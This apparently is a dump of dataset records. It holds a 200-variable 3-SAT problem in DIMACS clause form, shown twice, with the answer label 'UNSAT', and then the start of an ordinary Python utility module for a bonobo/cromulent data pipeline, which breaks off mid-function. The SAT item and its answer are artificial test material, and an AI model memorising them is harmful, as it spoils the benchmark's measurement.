107 -170 72 0
179 -115 69 0
139 179 -88 0
99 68 154 0
-175 26 130 0
174 159 -134 0
-73 -182 -191 0
10 -28 16 0
119 36 -103 0
-35 51 -17 0
-197 -58 -185 0
-149 -155 166 0
-104 -155 -140 0
-48 -194 47 0
6 4 170 0
-51 189 -59 0
67 9 92 0
111 -149 -144 0
-17 -65 75 0
6 166 17 0
-55 -124 61 0
62 -175 77 0
46 81 -170 0
-158 159 -153 0
108 34 -31 0
118 133 1 0
137 -105 -63 0
138 51 -142 0
27 -57 -103 0
106 -158 -55 0
-180 -139 -199 0
-15 -151 182 0
24 -97 40 0
-152 -59 -85 0
-159 39 124 0
-157 55 -126 0
67 -140 36 0
109 -167 -187 0
51 189 -12 0
30 110 -190 0
-120 -3 -133 0
1 -81 -174 0
170 -77 123 0
-16 -64 48 0
51 9 -122 0
197 -90 76 0
-184 144 -156 0
-146 26 -186 0
44 -114 13 0
192 24 170 0
-14 144 177 0
-116 -45 189 0
-163 93 -78 0
-177 -196 -51 0
-165 104 4 0
140 -21 138 0
69 182 33 0
132 -54 183 0
16 -58 183 0
13 -132 -166 0
146 54 94 0
-156 -162 98 0
-60 -54 -145 0
-186 126 -75 0
-85 -3 148 0
190 -162 -6 0
-115 -30 32 0
-182 -113 22 0
21 -121 73 0
55 -82 87 0
-148 -36 182 0
-178 96 -183 0
-163 -179 43 0
-161 120 135 0
114 46 176 0
143 -79 -165 0
-32 60 100 0
18 -21 135 0
-140 173 127 0
-117 129 -102 0
110 -127 80 0
-91 61 200 0
-79 -168 198 0
144 -90 27 0
188 -196 -190 0
-5 -26 58 0
11 43 -195 0
-17 83 5 0
154 -72 17 0
-77 -167 -67 0
-33 60 68 0
-137 -37 22 0
69 54 -80 0
119 -141 -73 0
124 -193 -81 0
123 164 -94 0
-179 119 51 0
21 -84 -72 0
146 -8 -50 0
-200 198 190 0
-138 161 68 0
-139 134 -58 0
-121 85 -133 0
-5 -186 71 0
-188 -106 184 0
122 -3 10 0
1 144 -85 0
-117 19 -123 0
-158 23 -90 0
96 -125 -141 0
-25 136 40 0
134 -81 -76 0
84 -167 -99 0
141 -110 -115 0
-95 98 -73 0
-151 31 -183 0
168 -44 -129 0
162 32 -111 0
-10 106 164 0
-46 -117 -163 0
-10 -39 162 0
54 -139 -119 0
73 -67 173 0
67 92 -64 0
-84 51 194 0
61 -74 -41 0
-61 -24 57 0
186 -27 82 0
-156 41 -127 0
102 -179 89 0
-71 155 33 0
61 -68 55 0
193 -78 57 0
6 -120 -110 0
-103 -52 5 0
-54 184 -62 0
-115 -39 -174 0
58 196 152 0
-152 -3 -142 0
1 -83 142 0
-77 24 -131 0
123 122 -2 0
-41 -147 -163 0
102 -60 -84 0
-118 70 193 0
-44 -156 23 0
-8 147 -114 0
93 115 -72 0
125 -158 -148 0
-151 -28 -71 0
151 -75 -65 0
-186 -41 193 0
-141 -119 -147 0
-196 51 31 0
-119 164 19 0
51 -40 101 0
94 -171 -175 0
120 130 -84 0
-74 -64 -150 0
-133 72 78 0
-45 118 105 0
67 164 -137 0
-176 -89 -158 0
-168 80 12 0
167 -168 -8 0
182 84 7 0
-13 165 -124 0
95 -187 -193 0
184 -91 80 0
-15 -35 -71 0
-9 137 68 0
76 -75 -87 0
-59 -120 -154 0
-131 8 55 0
43 -89 -108 0
89 148 56 0
-166 -9 42 0
-192 -95 133 0
195 -182 -124 0
-29 199 -3 0
-11 -186 -8 0
195 -110 65 0
-12 167 85 0
-41 50 117 0
-192 11 -181 0
86 -194 -165 0
-29 -111 93 0
122 5 -92 0
13 -79 108 0
-89 184 95 0
-142 -127 66 0
-110 81 104 0
-154 -44 9 0
-159 -143 -12 0
120 14 -8 0
-114 102 -172 0
22 149 -108 0
-151 -152 -20 0
-101 -22 110 0
-43 -115 176 0
68 -61 51 0
105 -63 -112 0
177 -179 185 0
113 39 -111 0
138 -115 133 0
-153 -91 -52 0
-189 -22 -49 0
-195 -20 30 0
-45 89 137 0
-199 126 143 0
194 147 7 0
35 53 -50 0
-194 -87 116 0
-73 70 -83 0
145 -129 54 0
-195 -127 -16 0
-174 -20 128 0
-40 -172 120 0
195 -97 184 0
-51 155 63 0
91 168 -176 0
-193 167 1 0
153 35 83 0
122 145 185 0
-31 87 -64 0
1 21 53 0
37 -169 120 0
130 -48 -86 0
-27 -34 79 0
-61 181 -57 0
12 68 -4 0
-66 198 -99 0
-110 50 -66 0
-88 -26 -74 0
-35 64 187 0
-78 -197 190 0
191 -137 47 0
75 -18 63 0
190 166 72 0
98 -120 -88 0
-163 -14 140 0
-144 -149 -86 0
114 146 -69 0
-179 182 144 0
98 -186 -46 0
16 3 -166 0
-196 88 -150 0
190 35 166 0
-191 178 18 0
195 -111 41 0
-63 190 184 0
119 159 28 0
-167 -125 6 0
-173 49 -147 0
-174 -82 -129 0
-24 -16 -53 0
-79 -122 -64 0
-119 190 -129 0
-29 -106 -152 0
22 -110 143 0
-45 54 40 0
-155 -103 -2 0
-195 -139 131 0
145 -48 -64 0
115 -181 79 0
-190 145 -5 0
-92 164 -47 0
-75 127 -169 0
-10 -100 193 0
-129 37 -167 0
106 20 172 0
-43 -40 -129 0
-7 107 -133 0
-73 -84 161 0
-78 94 80 0
4 -129 149 0
-47 58 118 0
-120 116 -155 0
-100 -87 78 0
106 141 190 0
-15 22 86 0
187 174 -90 0
61 -21 -153 0
-12 -200 -95 0
-85 -158 114 0
-15 -172 150 0
54 -36 96 0
122 35 95 0
185 149 -68 0
-138 46 -56 0
115 39 -119 0
-83 -131 -12 0
92 157 192 0
-33 107 -198 0
122 182 -7 0
-71 65 63 0
107 -178 46 0
166 3 87 0
-52 18 -131 0
-138 -196 -48 0
-128 -37 50 0
125 -194 -101 0
-36 20 23 0
-6 -127 -2 0
103 -137 -60 0
86 77 117 0
200 171 -16 0
91 -5 -48 0
115 -2 85 0
151 -55 41 0
-46 -1 171 0
164 173 -105 0
15 46 -126 0
-161 117 107 0
140 84 -49 0
-167 194 77 0
136 71 -70 0
196 75 47 0
54 103 126 0
-77 159 -147 0
21 18 108 0
172 31 85 0
180 -44 -198 0
42 -122 39 0
179 -52 -106 0
79 146 -105 0
-120 156 69 0
15 -153 -10 0
-118 -113 -33 0
-129 56 34 0
-8 -199 73 0
-103 -133 147 0
-177 -42 54 0
162 -168 55 0
17 -107 -34 0
-62 -149 -199 0
168 -93 135 0
74 128 62 0
117 158 188 0
-139 -164 -118 0
62 29 57 0
86 -28 124 0
-198 -51 -68 0
-139 -113 -98 0
23 -98 -171 0
-121 -139 -53 0
-138 -92 67 0
-146 3 -103 0
-190 126 83 0
131 -87 21 0
117 107 -69 0
16 183 -4 0
150 -200 -18 0
179 -184 -193 0
108 -7 -178 0
-112 27 97 0
37 -61 13 0
188 82 101 0
-4 -124 -46 0
53 188 74 0
-14 129 194 0
25 60 94 0
-190 -5 119 0
-54 11 -166 0
-102 -77 158 0
91 -20 -102 0
160 58 46 0
124 -164 -147 0
65 -38 -157 0
91 -86 122 0
-191 69 -167 0
-172 -138 118 0
-52 61 145 0
-31 41 -4 0
-77 -38 33 0
-97 162 -26 0
-121 25 153 0
68 -48 142 0
130 65 50 0
-103 115 177 0
-56 126 158 0
99 162 -171 0
6 168 -55 0
34 -61 77 0
-23 158 -101 0
127 136 20 0
146 180 106 0
130 32 -173 0
13 169 198 0
-108 59 -42 0
87 -162 173 0
196 173 157 0
12 186 -135 0
-60 117 177 0
-22 -96 -27 0
-116 -94 141 0
-137 -170 164 0
-110 106 -13 0
35 -118 106 0
-167 190 45 0
127 -187 -196 0
-50 41 -132 0
143 121 169 0
-62 -69 -68 0
-60 198 -18 0
-62 58 -158 0
135 10 -68 0
-145 -10 -36 0
-187 -91 131 0
195 84 36 0
-181 50 -79 0
12 61 -14 0
139 -30 -123 0
-51 -184 39 0
-37 23 18 0
191 -120 156 0
83 103 124 0
-171 199 156 0
-41 64 -157 0
-181 162 199 0
8 -158 -160 0
-21 -37 163 0
42 137 190 0
-123 -70 50 0
9 127 187 0
16 169 -114 0
179 142 28 0
7 147 191 0
48 -58 -198 0
-118 -10 185 0
57 -107 -106 0
65 96 173 0
54 64 66 0
-160 193 -101 0
199 65 -76 0
-141 138 157 0
81 102 163 0
180 -132 -134 0
154 5 175 0
-120 42 -64 0
109 -143 88 0
75 71 77 0
-19 -10 -123 0
12 45 71 0
127 -158 199 0
98 -198 120 0
-116 129 166 0
124 -186 -34 0
-63 -140 195 0
-162 172 19 0
190 107 76 0
-108 -193 -24 0
-54 -148 -132 0
158 184 83 0
-75 -4 101 0
49 96 17 0
-19 104 -73 0
197 159 101 0
172 196 3 0
-132 192 -120 0
-151 -92 -200 0
-147 -128 -179 0
89 188 191 0
-152 -102 -175 0
177 -133 -127 0
-69 -80 -154 0
160 -122 -67 0
117 95 31 0
187 -114 55 0
-52 102 -18 0
-34 -111 -131 0
70 93 -152 0
-72 -58 -60 0
-151 196 -59 0
12 -159 -1 0
-173 133 167 0
198 61 166 0
-188 94 8 0
-156 39 -2 0
184 -151 -89 0
-112 -160 -144 0
156 35 123 0
27 -84 105 0
-166 -50 157 0
-168 -26 179 0
74 96 94 0
199 195 178 0
114 -27 144 0
48 105 53 0
128 -117 -34 0
-28 -109 -159 0
197 40 23 0
142 20 -42 0
-21 103 -12 0
122 -31 40 0
-24 -10 -57 0
110 -123 72 0
114 20 -160 0
-14 94 -121 0
-31 195 -163 0
-98 -45 143 0
-110 -3 -195 0
142 86 -186 0
194 -125 28 0
-60 129 -180 0
134 141 197 0
-92 -68 30 0
182 6 96 0
146 -195 14 0
-78 -56 -61 0
-78 139 144 0
-190 -48 -163 0
-19 -40 -181 0
-92 -191 25 0
-156 122 38 0
195 13 -190 0
99 -57 -184 0
141 -124 -113 0
-81 38 40 0
68 199 -12 0
-178 -118 -20 0
-188 183 -96 0
190 144 121 0
43 -111 40 0
-10 -39 -68 0
-42 -17 83 0
-135 -101 -82 0
-153 198 -23 0
-188 -86 146 0
-26 -126 -89 0
-113 135 93 0
-161 20 -162 0
165 1 106 0
-159 -27 79 0
78 -60 184 0
79 -53 -166 0
106 170 -55 0
-19 -30 90 0
-152 176 56 0
-108 91 -50 0
-104 100 -171 0
85 -197 -93 0
99 106 12 0
20 -108 -103 0
-142 -92 137 0
70 75 -10 0
30 51 -129 0
-132 -38 63 0
-59 66 48 0
-88 -118 43 0
-71 200 -182 0
6 -177 -172 0
"""
output = "UNSAT"
| fr | 0.14599 | c num blocks = 1 c num vars = 200 c minblockids[0] = 1 c maxblockids[0] = 200 p cnf 200 890 -80 -16 -14 0 -14 -200 -190 0 61 -149 133 0 -86 -126 -9 0 11 -79 -15 0 -119 -191 -174 0 -154 -29 -134 0 -78 -118 76 0 -106 119 173 0 131 -140 -141 0 64 18 -147 0 -132 -12 158 0 122 -143 -117 0 -5 80 -128 0 -113 -108 -171 0 62 -134 -159 0 63 118 12 0 -127 -98 41 0 -190 172 -182 0 153 -77 143 0 -142 138 53 0 -70 -125 -160 0 120 195 108 0 -177 -184 -106 0 -168 175 160 0 -153 -84 -96 0 -42 133 190 0 -24 -78 -162 0 5 -105 73 0 105 19 -130 0 151 -142 -95 0 86 -156 173 0 180 172 98 0 186 130 65 0 -84 126 -57 0 -88 8 -126 0 43 -172 -185 0 -99 149 -83 0 13 61 169 0 197 -56 -142 0 98 73 118 0 -124 9 -90 0 150 29 72 0 13 -59 183 0 -7 23 78 0 67 1 -158 0 -151 142 -35 0 -62 198 -99 0 -43 -111 157 0 -197 -193 -141 0 -179 5 -50 0 105 74 134 0 -86 12 33 0 71 -151 88 0 -119 11 -48 0 -133 158 53 0 196 -64 -199 0 186 42 -105 0 -137 189 139 0 -95 46 3 0 -160 -41 -176 0 -12 -173 20 0 146 149 21 0 -174 -103 164 0 -21 -96 145 0 -191 137 97 0 32 -183 180 0 -130 78 59 0 -5 157 166 0 167 -112 -179 0 -10 107 -161 0 54 -34 93 0 -138 47 -193 0 -42 -8 159 0 -84 35 93 0 -182 -100 32 0 -50 101 63 0 23 22 167 0 -21 -77 134 0 111 -107 159 0 -77 -7 114 0 40 41 -166 0 165 -21 15 0 -100 166 80 0 -118 162 -180 0 -190 62 -159 0 -72 113 -2 0 -110 167 -45 0 -79 -143 138 0 172 126 32 0 -117 43 -102 0 -12 81 -58 0 54 191 171 0 -161 -103 -126 0 99 28 143 0 138 111 -42 0 112 95 -88 0 167 -95 140 0 87 -150 105 0 -39 65 -81 0 -115 145 104 0 -118 22 3 0 63 -16 197 0 128 -153 -100 0 -139 5 -166 0 37 68 171 0 82 9 -125 0 191 -59 77 0 71 82 -2 0 -8 134 74 0 -32 -44 165 0 -101 114 -131 0 51 199 -46 0 110 -90 -6 0 -187 -21 -139 0 -154 12 -140 0 -139 -123 195 0 -41 -157 -58 0 25 -137 -52 0 61 -38 -57 0 -172 131 126 0 -104 90 -142 0 44 -198 179 0 16 -82 87 0 -134 14 48 0 -163 -64 24 0 -138 -127 -141 0 -51 -180 -54 0 -23 90 102 0 174 -118 -134 0 131 -69 -92 0 76 -111 -19 0 96 -72 151 0 42 -47 122 0 -99 -107 -17 0 -39 97 198 0 -111 159 66 0 133 -176 -30 0 -16 -58 87 0 -42 32 -94 0 -199 184 -146 0 -106 -7 -94 0 79 126 -185 0 -152 151 -13 0 -69 -184 25 0 -128 131 182 0 -192 29 -74 0 31 -177 -21 0 -123 30 -132 0 53 13 38 0 -3 185 -77 0 -167 -98 71 0 155 58 -90 0 143 -189 -174 0 91 110 -116 0 181 -157 19 0 -26 189 151 0 -63 167 2 0 -60 113 -57 0 64 -25 180 0 15 -12 97 0 -145 136 124 0 11 -73 -107 0 -135 -86 -73 0 -53 -166 -11 0 105 187 -102 0 22 1 -26 0 -12 142 -167 0 123 107 174 0 -26 -128 -162 0 -118 -74 133 0 95 -144 54 0 -1 -165 -188 0 -113 154 -175 0 92 -59 98 0 -111 70 -128 0 3 -21 89 0 87 -195 142 0 93 -144 -90 0 177 -120 52 0 169 141 -5 0 75 -10 -192 0 -33 -22 -66 0 6 183 196 0 -143 146 73 0 -168 124 -139 0 15 -17 124 0 -65 184 -82 0 -148 -100 -141 0 72 64 -10 0 -190 1 -150 0 2 -17 -96 0 -4 -160 105 0 -100 -122 -23 0 -102 22 -128 0 -139 181 102 0 -8 -105 120 0 -141 159 -174 0 112 124 122 0 -66 -167 131 0 155 -176 -27 0 44 -124 -103 0 -162 -142 63 0 46 -158 136 0 187 12 -90 0 -91 136 -24 0 147 130 -33 0 64 32 56 0 -54 -10 -179 0 -127 -132 -74 0 -123 -15 120 0 161 80 60 0 -72 116 113 0 85 -39 -160 0 12 125 -135 0 -20 -15 -195 0 109 -114 -185 0 115 -185 200 0 -90 -142 -80 0 19 -94 43 0 24 43 -57 0 -50 69 15 0 -117 -133 84 0 -163 -85 -35 0 91 70 175 0 -10 -20 127 0 144 40 -184 0 -104 -36 21 0 -122 131 18 0 59 115 16 0 154 -14 -8 0 -182 -105 20 0 198 -30 56 0 -57 -176 97 0 45 -195 191 0 55 193 -31 0 54 67 15 0 146 136 119 0 164 36 -100 0 4 -197 139 0 187 189 144 0 -183 36 154 0 47 173 -159 0 93 -78 -146 0 -170 9 131 0 -174 -186 38 0 102 29 -63 0 46 137 -138 0 -192 54 -17 0 -108 -54 5 0 -144 111 68 0 133 -69 35 0 30 -28 66 0 -62 156 31 0 157 -32 95 0 -73 21 144 0 -14 172 -30 0 -15 143 -107 0 -70 86 141 0 77 192 144 0 -80 -94 133 0 95 17 -148 0 66 15 159 0 -136 -58 62 0 75 -21 191 0 161 -12 175 0 -42 -117 -18 0 -192 147 -1 0 -28 -137 -151 0 41 17 146 0 -186 -182 105 0 -44 102 85 0 183 29 32 0 -84 32 167 0 21 -197 -172 0 -142 19 54 0 -107 -173 -143 0 -24 165 79 0 -138 -17 75 0 -93 -108 178 0 -104 77 138 0 -164 37 -97 0 51 55 -171 0 70 103 -191 0 -161 46 -13 0 -123 6 173 0 4 73 -60 0 -170 -114 -56 0 -179 -191 -172 0 149 145 43 0 -118 91 -51 0 -12 152 167 0 -196 -162 -9 0 -38 -17 -110 0 -96 -5 -36 0 97 109 -191 0 -89 -38 31 0 70 -184 94 0 -144 -146 11 0 -32 104 144 0 136 -163 -14 0 51 -4 -12 0 66 48 -153 0 -44 -10 8 0 54 106 102 0 5 58 78 0 -142 170 83 0 39 -173 -175 0 196 -149 104 0 160 4 44 0 -101 36 -50 0 -86 -62 -163 0 -85 -49 -169 0 -97 -145 93 0 147 35 38 0 13 28 -30 0 -64 -175 18 0 -144 129 33 0 -149 -158 -21 0 -152 -22 -92 0 -23 90 -111 0 189 -176 -65 0 -107 -94 -146 0 113 106 45 0 186 -47 -115 0 141 -4 -142 0 -93 -5 46 0 -183 -191 -187 0 18 12 168 0 -14 -30 177 0 -50 104 15 0 178 -165 -6 0 -55 7 -179 0 -77 -7 -135 0 28 106 -134 0 -138 -159 -192 0 -83 1 164 0 33 39 91 0 107 -170 72 0 179 -115 69 0 139 179 -88 0 99 68 154 0 -175 26 130 0 174 159 -134 0 -73 -182 -191 0 10 -28 16 0 119 36 -103 0 -35 51 -17 0 -197 -58 -185 0 -149 -155 166 0 -104 -155 -140 0 -48 -194 47 0 6 4 170 0 -51 189 -59 0 67 9 92 0 111 -149 -144 0 -17 -65 75 0 6 166 17 0 -55 -124 61 0 62 -175 77 0 46 81 -170 0 -158 159 -153 0 108 34 -31 0 118 133 1 0 137 -105 -63 0 138 51 -142 0 27 -57 -103 0 106 -158 -55 0 -180 -139 -199 0 -15 -151 182 0 24 -97 40 0 -152 -59 -85 0 -159 39 124 0 -157 55 -126 0 67 -140 36 0 109 -167 -187 0 51 189 -12 0 30 110 -190 0 -120 -3 -133 0 1 -81 -174 0 170 -77 123 0 -16 -64 48 0 51 9 -122 0 197 -90 76 0 -184 144 -156 0 -146 26 -186 0 44 -114 13 0 192 24 170 0 -14 144 177 0 -116 -45 189 0 -163 93 -78 0 -177 -196 -51 0 -165 104 4 0 140 -21 138 0 69 182 33 0 132 -54 183 0 16 -58 183 0 13 -132 -166 0 146 54 94 0 -156 -162 98 0 -60 -54 -145 0 -186 126 -75 0 -85 -3 148 0 190 -162 -6 0 -115 -30 32 0 -182 -113 22 0 21 -121 73 0 55 -82 87 0 -148 -36 182 0 -178 96 -183 0 -163 -179 43 0 -161 120 135 0 114 46 176 0 143 -79 -165 0 -32 60 100 0 18 -21 135 0 -140 173 127 0 -117 129 -102 0 110 -127 80 0 -91 61 200 0 -79 -168 198 0 144 -90 27 0 188 -196 -190 0 -5 -26 58 0 11 43 -195 0 -17 83 5 0 154 -72 17 0 -77 -167 -67 0 -33 60 68 0 -137 -37 22 0 69 54 -80 0 119 -141 -73 0 124 -193 -81 0 123 164 -94 0 -179 119 51 0 21 -84 -72 0 146 -8 -50 0 -200 198 190 0 -138 161 68 0 -139 134 -58 0 -121 85 -133 0 -5 -186 71 0 -188 -106 184 0 122 -3 10 0 1 144 -85 0 -117 19 -123 0 -158 23 -90 0 96 -125 -141 0 -25 136 40 0 134 -81 -76 0 84 -167 -99 0 141 -110 -115 0 -95 98 -73 0 -151 31 -183 0 168 -44 -129 0 162 32 -111 0 -10 106 164 0 -46 -117 -163 0 -10 -39 162 0 54 -139 -119 0 73 -67 173 0 67 92 -64 0 -84 51 194 0 61 -74 -41 0 -61 -24 57 0 186 -27 82 0 -156 41 -127 0 102 -179 89 0 -71 155 33 0 61 -68 55 0 193 -78 57 0 6 -120 -110 0 -103 -52 5 0 -54 184 -62 0 -115 -39 -174 0 58 196 152 0 -152 -3 -142 0 1 -83 142 0 -77 24 -131 0 123 122 -2 0 -41 -147 -163 0 102 -60 -84 0 -118 70 193 0 -44 -156 23 0 -8 147 -114 0 93 115 -72 0 125 -158 -148 0 -151 -28 -71 0 151 -75 -65 0 -186 -41 193 0 -141 -119 -147 0 -196 51 31 0 -119 164 19 0 51 -40 101 0 94 -171 -175 0 120 130 -84 0 -74 -64 -150 0 -133 72 78 0 -45 118 105 0 67 164 -137 0 -176 -89 -158 0 -168 80 12 0 167 -168 -8 0 182 84 7 0 -13 165 -124 0 95 -187 -193 0 184 -91 80 0 -15 -35 -71 0 -9 137 68 0 76 -75 -87 0 -59 -120 -154 0 -131 8 55 0 43 -89 -108 0 89 148 56 0 -166 -9 42 0 -192 -95 133 0 195 -182 -124 0 -29 199 -3 0 -11 -186 -8 0 195 -110 65 0 -12 167 85 0 -41 50 117 0 -192 11 -181 0 86 -194 -165 0 -29 -111 93 0 122 5 -92 0 13 -79 108 0 -89 184 95 0 -142 -127 66 0 -110 81 104 0 -154 -44 9 0 -159 -143 -12 0 120 14 -8 0 -114 102 -172 0 22 149 -108 0 -151 -152 -20 0 -101 -22 110 0 -43 -115 176 0 68 -61 51 0 105 -63 -112 0 177 -179 185 0 113 39 -111 0 138 -115 133 0 -153 -91 -52 0 -189 -22 -49 0 -195 -20 30 0 -45 89 137 0 -199 126 143 0 194 147 7 0 35 53 -50 0 -194 -87 116 0 -73 70 -83 0 145 -129 54 0 -195 -127 -16 0 -174 -20 128 0 -40 -172 120 0 195 -97 184 0 -51 155 63 0 91 168 -176 0 -193 167 1 0 153 35 83 0 122 145 185 0 -31 87 -64 0 1 21 53 0 37 -169 120 0 130 -48 -86 0 -27 -34 79 0 -61 181 -57 0 12 68 -4 0 -66 198 -99 0 -110 50 -66 0 -88 -26 -74 0 -35 64 187 0 -78 -197 190 0 191 -137 47 0 75 -18 63 0 190 166 72 0 98 -120 -88 0 -163 -14 140 0 -144 -149 -86 0 114 146 -69 0 -179 182 144 0 98 -186 -46 0 16 3 -166 0 -196 88 -150 0 190 35 166 0 -191 178 18 0 195 -111 41 0 -63 190 184 0 119 159 28 0 -167 -125 6 0 -173 49 -147 0 -174 -82 -129 0 -24 -16 -53 0 -79 -122 -64 0 -119 190 -129 0 -29 -106 -152 0 22 -110 143 0 -45 54 40 0 -155 -103 -2 0 -195 -139 131 0 145 -48 -64 0 115 -181 79 0 -190 145 -5 0 -92 164 -47 0 -75 127 -169 0 -10 -100 193 0 -129 37 -167 0 106 20 172 0 -43 -40 -129 0 -7 107 -133 0 -73 -84 161 0 -78 94 80 0 4 -129 149 0 -47 58 118 0 -120 116 -155 0 -100 -87 78 0 106 141 190 0 -15 22 86 0 187 174 -90 0 61 -21 -153 0 -12 -200 -95 0 -85 -158 114 0 -15 -172 150 0 54 -36 96 0 122 35 95 0 185 149 -68 0 -138 46 -56 0 115 39 -119 0 -83 -131 -12 0 92 157 192 0 -33 107 -198 0 122 182 -7 0 -71 65 63 0 107 -178 46 0 166 3 87 0 -52 18 -131 0 -138 -196 -48 0 -128 -37 50 0 125 -194 -101 0 -36 20 23 0 -6 -127 -2 0 103 -137 -60 0 86 77 117 0 200 171 -16 0 91 -5 -48 0 115 -2 85 0 151 -55 41 0 -46 -1 171 0 164 173 -105 0 15 46 -126 0 -161 117 107 0 140 84 -49 0 -167 194 77 0 136 71 -70 0 196 75 47 0 54 103 126 0 -77 159 -147 0 21 18 108 0 172 31 85 0 180 -44 -198 0 42 -122 39 0 179 -52 -106 0 79 146 -105 0 -120 156 69 0 15 -153 -10 0 -118 -113 -33 0 -129 56 34 0 -8 -199 73 0 -103 -133 147 0 -177 -42 54 0 162 -168 55 0 17 -107 -34 0 -62 -149 -199 0 168 -93 135 0 74 128 62 0 117 158 188 0 -139 -164 -118 0 62 29 57 0 86 -28 124 0 -198 -51 -68 0 -139 -113 -98 0 23 -98 -171 0 -121 -139 -53 0 -138 -92 67 0 -146 3 -103 0 -190 126 83 0 131 -87 21 0 117 107 -69 0 16 183 -4 0 150 -200 -18 0 179 -184 -193 0 108 -7 -178 0 -112 27 97 0 37 -61 13 0 188 82 101 0 -4 -124 -46 0 53 188 74 0 -14 129 194 0 25 60 94 0 -190 -5 119 0 -54 11 -166 0 -102 -77 158 0 91 -20 -102 0 160 58 46 0 124 -164 -147 0 65 -38 -157 0 91 -86 122 0 -191 69 -167 0 -172 -138 118 0 -52 61 145 0 -31 41 -4 0 -77 -38 33 0 -97 162 -26 0 -121 25 153 0 68 -48 142 0 130 65 50 0 -103 115 177 0 -56 126 158 0 99 162 -171 0 6 168 -55 0 34 -61 77 0 -23 158 -101 0 127 136 20 0 146 180 106 0 130 32 -173 0 13 169 198 0 -108 59 -42 0 87 -162 173 0 196 173 157 0 12 186 -135 0 -60 117 177 0 -22 -96 -27 0 -116 -94 141 0 -137 -170 164 0 -110 106 -13 0 35 -118 106 0 -167 190 45 0 127 -187 -196 0 -50 41 -132 0 143 121 169 0 -62 -69 -68 0 -60 198 -18 0 -62 58 -158 0 135 10 -68 0 -145 -10 -36 0 -187 -91 131 0 195 84 36 0 -181 50 -79 0 12 61 -14 0 139 -30 -123 0 -51 -184 39 0 -37 23 18 0 191 -120 156 0 83 103 124 0 -171 199 156 0 -41 64 -157 0 -181 162 199 0 8 -158 -160 0 -21 -37 163 0 42 137 190 0 -123 -70 50 0 9 127 187 0 16 169 -114 0 179 142 28 0 7 147 191 0 48 -58 -198 0 -118 -10 185 0 57 -107 -106 0 65 96 173 0 54 64 66 0 -160 193 -101 0 199 65 -76 0 -141 138 157 0 81 102 163 0 180 -132 -134 0 154 5 175 0 -120 42 -64 0 109 -143 88 0 75 71 77 0 -19 -10 -123 0 12 45 71 0 127 -158 199 0 98 -198 120 0 -116 129 166 0 124 -186 -34 0 -63 -140 195 0 -162 172 19 0 190 107 76 0 -108 -193 -24 0 -54 -148 -132 0 158 184 83 0 -75 -4 101 0 49 96 17 0 -19 104 -73 0 197 159 101 0 172 196 3 0 -132 192 -120 0 -151 -92 -200 0 -147 -128 -179 0 89 188 191 0 -152 -102 -175 0 177 -133 -127 0 -69 -80 -154 0 160 -122 -67 0 117 95 31 0 187 -114 55 0 -52 102 -18 0 -34 -111 -131 0 70 93 -152 0 -72 -58 -60 0 -151 196 -59 0 12 -159 -1 0 -173 133 167 0 198 61 166 0 -188 94 8 0 -156 39 -2 0 184 -151 -89 0 -112 -160 -144 0 156 35 123 0 27 -84 105 0 -166 -50 157 0 -168 -26 179 0 74 96 94 0 199 195 178 0 114 -27 144 0 48 105 53 0 128 -117 -34 0 -28 -109 -159 0 197 40 23 0 142 20 -42 0 -21 103 -12 0 122 -31 40 0 -24 -10 -57 0 110 -123 72 0 114 20 -160 0 -14 94 -121 0 -31 195 -163 0 -98 -45 143 0 -110 -3 -195 0 142 86 -186 0 194 -125 28 0 -60 129 -180 0 134 141 197 0 -92 -68 30 0 182 6 96 0 146 -195 14 0 -78 -56 -61 0 -78 139 144 0 -190 -48 -163 0 -19 -40 -181 0 -92 -191 25 0 -156 122 38 0 195 13 -190 0 99 -57 -184 0 141 -124 -113 0 -81 38 40 0 68 199 -12 0 -178 -118 -20 0 -188 183 -96 0 190 144 121 0 43 -111 40 0 -10 -39 -68 0 -42 -17 83 0 -135 -101 -82 0 -153 198 -23 0 -188 -86 146 0 -26 -126 -89 0 -113 135 93 0 -161 20 -162 0 165 1 106 0 -159 -27 79 0 78 -60 184 0 79 -53 -166 0 106 170 -55 0 -19 -30 90 0 -152 176 56 0 -108 91 -50 0 -104 100 -171 0 85 -197 -93 0 99 106 12 0 20 -108 -103 0 -142 -92 137 0 70 75 -10 0 30 51 -129 0 -132 -38 63 0 -59 66 48 0 -88 -118 43 0 -71 200 -182 0 6 -177 -172 0 | 1.960158 | 2 |
pipeline/util/__init__.py | kasei/pipeline | 5 | 6632504 | import re
import os
import sys
import fnmatch
import pprint
import calendar
import datetime
from threading import Lock
from contextlib import ContextDecorator, suppress
from collections import defaultdict, namedtuple
import warnings
import dateutil.parser
from bonobo.config import Configurable, Option, Service
import settings
import pipeline.io.arches
from cromulent import model, vocab
from cromulent.model import factory, BaseResource
from pipeline.linkedart import add_crom_data
UNKNOWN_DIMENSION = 'http://vocab.getty.edu/aat/300055642'
# Dimension = namedtuple("Dimension", [
# 'value', # numeric value
# 'unit', # unit
# 'which' # e.g. width, height, ...
# ])
#
def identity(d):
'''
Simply yield the value that is passed as an argument.
This is trivial, but necessary for use in constructing some bonobo graphs.
For example, if two already instantiated graph chains need to be connected,
one being used as input to the other, bonobo does not allow this:
`graph.add_chain(_input=prefix.output, _output=suffix.input)`
Instead, the `add_chain` call requires at least one graph node to be added. Hence:
`graph.add_chain(identity, _input=prefix.output, _output=suffix.input)`
'''
yield d
def extract_date_tuple(data:dict, prefix:str=''):
'''
Given a dict `data` and a string `prefix`, extract year, month, and day elements
from `data` (e.g. '{prefix}year', '{prefix}month', and '{prefix}day'), and return
them as a tuple.
'''
year = data.get(f'{prefix}year')
month = data.get(f'{prefix}month', data.get(f'{prefix}mo'))
day = data.get(f'{prefix}day')
return (year, month, day)
def implode_date_tuple(date_tuple, clamp):
'''
Given a date string tuple `(year, month, day)`, return an ISO 8601 date
string ('YYYY-MM-DD'). If the day, or day and month elements are missing,
may also return a year-month ('YYYY-MM') or year ('YYYY') string.
If `clamp='begin'` and a year value is found, the resulting date string will use
the earliest valid value for any field (month or day) that is not present or false.
For example, '1800-02' would become '1800-02-01'.
If `clamp='end'`, clamping occurs using the latest valid values. For example,
'1800-02' would become '1800-02-28'.
If `clamp='eoe'` ('end of the end'), clamping occurs using the first value that is
*not* valid. That is, the returned value may be used as an exclusive endpoint for a
date range. For example, '1800-02' would become '1800-03-01'.
'''
year, month, day = date_tuple
try:
year = int(year)
except:
return None
try:
month = int(month)
if month < 1 or month > 12:
raise ValueError(f'Month value is not valid: {month}')
except Exception as e:
if clamp == 'begin':
month = 1
day = 1
return '%04d-%02d-%02d' % (int(year), month, day)
elif clamp == 'end':
day = 31
month = 12
return '%04d-%02d-%02d' % (int(year), month, day)
elif clamp == 'eoe':
day = 1
month = 1
year += 1
